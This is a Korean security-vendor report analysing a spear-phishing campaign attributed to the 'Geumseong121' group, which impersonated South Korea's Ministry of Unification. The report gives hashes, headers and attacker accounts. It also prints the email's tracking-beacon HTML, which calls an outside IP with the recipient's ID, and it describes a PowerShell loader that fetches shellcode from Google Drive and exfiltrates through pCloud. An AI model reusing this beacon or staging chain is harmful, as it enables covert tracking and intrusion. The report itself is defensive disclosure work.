'금성121 조직', 통일부를 사칭한 APT 공격, 구글 드라이브로 악성코드 전파

안녕하세요? 이스트시큐리티 시큐리티대응센터(이하 ESRC)입니다.

지난 2019년 04월 22일 마치 한국의 통일부에서 배포한 보도자료 해명자료처럼 둔갑한 스피어 피싱(Spear Phishing) 공격 정황이 포착되었습니다.

ESRC에서는 해당 공격이 2018년 중순 발견되었던 통일부 사칭 사례와 일치함을 확인하였습니다.

■ '오퍼레이션 페이크 뉴스(Operation Fake News)' 명명

2018년 6월부터 7월까지 유사한 공격이 지속적으로 보고되었고, 모두 통일부를 사칭한 공통점이 존재합니다.

저희는 "금성121 그룹의 남북이산가족찾기 전수조사 사칭 이메일 주의" 내용으로 동일 공격그룹의 실제 사례들을 공개한 바 있습니다.

[그림 1] 통일부 보도자료 해명 자료로 위장한 이메일 화면

 

File Name	email_93682646.html
MD5	88107e3c785d3d30e5f6fc191622a157

File Name	memo.utr
MD5	86f83586c96943ce96309e3017a3500c

공격자는 '[통일부] 보도자료해명' 제목으로 이메일을 작성하였으며, 발신자 이메일 주소도 실제 통일부처럼 교묘하게 위장하고 있습니다.

이번 APT 공격배후에 정부차원의 지원을 받고 있는 해킹조직 '금성121(Geumseong121)'이 있다는 것을 확신하고 있으며, 구글 드라이브에 RIFF 포맷으로 위장한 암호화된 쉘코드를 등록해 은밀한 공격을 수행했습니다.

ESRC는 마치 통일부 보도자료 해명 내용처럼 사칭한 이번 스피어 피싱 공격을 '오퍼레이션 페이크 뉴스(Operation Fake News)'로 명명했습니다.

■ '금성121(Geumseong121)' APT 조직, 통일부 사칭한 html 공격 배경

공격에 사용된 이메일은 '*** <*********@unikorea.go.kr>' 주소가 발신지처럼 보여지지만, 실제 이메일 헤더를 분석해 보면, 'Hostinger Mail System'을 사용했습니다.

Received: from [127.0.1.1] (unknown [211.197.11.18])

(Authenticated sender: webadmin@smellisgood.top)

by nl-srv-smtpout1.hostinger.io ([Hostinger Mail System]) with ESMTPSA id

또한, 코드 내부에는 공격 대상자가 해당 이메일을 열람하는지 확인하기 위해 다음과 같은 비콘(Beacon) 코드를 포함합니다.

<html>

<body>

<table>

<br>

<tr>안녕하세요.<br></tr>

<tr>통일부 주무관 *** 입니다.<br></tr>

<tr background = "http://155.138.236.240/sec[.]png?id=수신자 아이디">일부 언론의 보도기사에 관한 통일부의 해명 입니다.<br></tr>

</table>

</body>

<html>

이메일에 첨부되어 있던 'email_93682646.html' 파일을 크롬 브라우저에서 실행하면 다음과 같이 마치 보안메일처럼 위장하고 있습니다.

자세히 살펴보면, 'Security Mail' 표현이 잘못 표기된 것도 알 수 있습니다.

[그림 2] html 실행시 보여지는 화면

비밀번호 입력 부분에 임의의 코드를 입력하고 [확인]버튼을 누르면 다음과 같은 메시지가 나타나며, 'Reload Page... 4' 부분은 1초까지 감소한 후 다시 초기 화면을 보여주게 됩니다.

Run-Time error '429':

ActiveX component can't create object

or Object-fit fix for Internet Explorer

Reload Page... 4

공격자는 크롬 브라우저에서는 로그인이 정상적으로 진행되지 않는 것처럼 위장한 후 인터넷 익스플로러(IE) 브라우저로 실행하도록 유도하게 됩니다.

[그림 3] 인터넷 익스플로러 브라우저에서 실행한 화면

IE 브라우저에서 임의의 비밀번호를 입력 후 [확인]버튼을 클릭하면 실제 다음과 같이 통일부 웹 사이트로 접속해 특정 화면을 불러오게 됩니다.

- https://unikorea.go.kr/upload/editUpload/20190418/2019041814360535872.png

- https://unikorea.go.kr/upload/editUpload/20190418/2019041814364795734.png

[그림 4] 통일부 웹 사이트 이미지 활용

두개의 이미지와 함께 다음과 같은 텍스트 내용을 보여주어, 실제 통일부의 보도 해명 자료처럼 현혹시키게 됩니다.

 

[그림 5] html 실행 후 2차 단계에서 보여지는 화면

html 파일은 이처럼 2단계로 사용자를 현혹하게 되며, 백그라운드에서 특정 구글 드라이브 주소로 접속하게 됩니다.

내부 코드에는  10진수로 명령어가 인코딩되어 있으며, 디코딩을 거치면 Base64 코드가 숨겨져 있습니다.

[그림 6] html 내부에 포함되어 있는 10진수 코드 화면

Base64 데이터가 디코딩되면, 통일부로 연결되는 PNG 이미지와 내용뿐만 아니라 파워쉘 명령어를 통해 다양한 기능이 작동합니다.

그 중에서 구글 드라이브의 특정 주소로 접속해 암호화된 파일을 다운로드하고, 로딩시키게 됩니다.

[그림 7] 구글 드라이브로 접속해 파일을 가져오는 코드

구글 드라이브로 연결이 성공하면, 'memo.utr' 파일을 다운로드하고 파워쉘 명령을 통해 디코딩과 함께 메모리 맵핑 과정을 수행하게 됩니다.

구글 드라이브의 소유자는 '한국정치학회'로 설정되어 있으며, 지메일 계정은 'kpsapress@gmail.com'으로 등록되어 있습니다. 공격자가 생성한 것인지, 침해를 입은 것인지는 아직 조사가 진행 중입니다.

[그림 7-1] 구글 드라이브 소유자 정보

'memo.utr' 파일은 마치 헤더가 RIFF처럼 위장하고 있으며, 인코딩된 데이터 크기 0xA1800, 디코딩 키 0x71F990D0 값을 토대로 다음의 디코딩 로직을 실행하게 됩니다.

[그림 7-2] 암호화된 코드 화면

[그림 7-3] 디코딩 루틴

최종 페이로드(Payload) 파일은 pCloud 서비스를 통해 감염자 정보를 전송하게 됩니다.

[그림 7-4] 피클라우드 코드 화면

ESRC에서는 악성코드 내부의 토큰을 분석해 공격자가 2018년 12월 03일 한메일 'kcrc1214@hanmail.net' 주소를 통해 클라우드 서비스에 가입한 것을 확인했습니다.

[그림 8] 피클라우드 사용자 정보 화면

■ 유사 APT 공격 사례 비교 분석

2018년 중순에 발견됐던 '금성121 그룹의 남북이산가족찾기 전수조사 사칭 이메일 주의' 사례에서 유포된 악성코드를 분석해 보면 내부에 다음과 같은 러시아어 PDB 코드가 발견된 바 있습니다.

- D:\System\Kernel32\Shell32\Sample\Release\Шалтай-Болтай.pdb

공격조직은 분석가들에게 의도적으로 혼란(False Flag)을 주기 위해 러시아어 표현을 등록한 것으로 보이고, 영문으로 번역하면 'Humpty Dumpty' 표현으로 변경됩니다.

[그림 9] 러시아아 PDB 구글 번역 화면

험프티 덤프티는 해외 전래동요에 나오는 주인공으로 담벼락위에 있는 의인화된 달걀 캐릭터입니다.

2018년 당시에도 html 유형의 첨부파일을 이용한 공격이 활용되었고, 2019년 4월 공격과 동일한 디자인이 사용되었습니다.

[그림 10] 2018년 06월 27일(좌), 2019년 04월 22일(우) 공격 비교화면

2018년과 2019년의 공격 벡터를 비교해 보면, 모두 동일한 디자인의 화면이 사용된 것을 알 수 있습니다.

그리고 보안메일 영문표현(Security Mail)에 동일하게 오타(Seculity Mail)가 포함되어 있어, 기존 이미지 파일을 그대로 사용했습니다.

html 코드의 시작부분은 다음과 같이 'meta http-equiv' 영역이 동일합니다.

<meta http-equiv='Content-Type' content='text/html; charset=UTF-8' />

<meta http-equiv='Cache-Control' content='no-cache' />

<meta http-equiv='Pragma' content='no-cache' />

<meta http-equiv='Expires' content='0' />

<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>

■ 마무리

ESRC는 정부후원을 받는 해킹그룹 '금성121' 활동이 증가하고 있는 것을 목격했습니다.

공격은 주로 스피어 피싱 이메일을 통해 시작되며, 마치 신뢰할만한 정부기관의 내용처럼 위장하고 있습니다.

'금성121' 조직의 최근 사례들을 정리해 보면 아래와 같고, 비슷한 형태로 공격이 진행되고 있으므로 유사 위협에 노출되지 않도록 참고하시면 좋겠습니다.

▶ 금성121 APT 조직, '오퍼레이션 하이 엑스퍼트(Operation High Expert)' / 2019. 04. 02

▶ 로켓맨 APT 캠페인, '오퍼레이션 골든 버드(Operation Golden Bird)' / 2019. 03. 20

▶ 홀리데이 와이퍼(Operation Holiday Wiper)로 귀환한 로켓맨 APT 캠페인 / 2019. 01. 23

▶ '오퍼레이션 블랙버드(Operation Blackbird)', 금성121의 모바일 침공 / 2018. 12. 13

▶ '코리안 스워드(Operation Korean Sword) 작전' 수행 중 / 2018. 11. 16

▶ 금성121 그룹의 최신 APT 캠페인 - '작전명 로켓 맨(Operation Rocket Man)' / 2018. 08. 22

▶ '금성121' 그룹의 '남북이산가족찾기 전수조사' 사칭 이메일 주의 / 2018. 07. 04

▶ 금성121, Flash Player Zero-Day (CVE-2018-4878) 공격 주의 / 2018. 02. 02

이스트시큐리티에서는 국내외 APT 공격과 관련한 추가 침해지표(IoC)와 분석 및 대응목적의 악성코드 데이터를 '쓰렛 인사이드(Threat Inside)' 서비스를 통해 지속적으로 제공하고 있습니다.